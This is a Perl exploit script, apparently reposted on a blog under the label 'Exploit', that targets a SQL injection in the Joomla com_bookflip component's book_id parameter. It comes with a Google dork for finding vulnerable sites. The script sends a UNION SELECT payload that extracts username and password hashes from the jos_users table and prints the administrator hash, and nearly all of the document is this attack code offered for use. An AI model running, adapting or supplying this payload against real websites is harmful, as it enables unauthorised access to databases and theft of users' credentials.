#!/usr/bin/perl -w
#Joomla com_bookflip(book_id) Sql injection#
########################################
#[~] Author : psychotic_girl
#[~] Greetz : v3n0m - z0mb13 - All YCL Crew
#---------------------------------------
#[!] BookFlip
#[!] psychotic_girl 2009
#[!] Yogyacarderlink
#[!] psychotic_girl gratuitement.
#[!] psychotic_girl@null.net
#[!] www.yogyacarderlink.web.id
#[!] 2.1
#---------------------------------------
#[!] Google_Dork: inurl:"com_bookflip"
########################################
system("color FF0000");
print "\t ###############################################################\n\n";
print "\t # Yogyacarderlink #\n\n";
print "\t ###############################################################\n\n";
print "\t # - Joomla com_bookflip(book_id)Remote SQL Injection Vuln #\n\n";
print "\t # - Yogyacarderlink #\n\n";
print "\t # - Cod3d by psychotic_girl #\n\n";
print "\t ###############################################################\n\n";
use LWP::UserAgent;
print "\nTarget page:[http://wwww.localhost/pathdir/]: ";
chomp(my $target=);
#Column Name
$c_n="concat(username,0x3a,password)";
#Table_name
$t_n="jos_users";
$U="-9999+UNION+SELECT+";
$b = LWP::UserAgent->new() or die "Could not initialize browser\n";
$b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');
$host = $target . "/index.php?option=com_bookflip&book_id=".$U."1,".$c_n.",3,4,5,6,7,8,9,0,11,12,13,14,15,
16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37+from/**/".$t_n."+--+";
$res = $b->request(HTTP::Request->new(GET=>$host));
$answer = $res->content; if ($answer =~/([0-9a-fA-F]{32})/){
print "\n[+] Admin Hash : $1\n\n";
print "# Admin Hash Found - by psychotic_girl (v3n0m_GirL) ! # \n\n";
}
else{print "\n[-] Admin Hash Not Found...\n";
}
23 Januari 2010
Joomla com_bookflip(book_id) Sql injection
Author: tRipLeZiX
|
Labels:
Exploit
Langganan:
Posting Komentar (Atom)







0 komentar:
Posting Komentar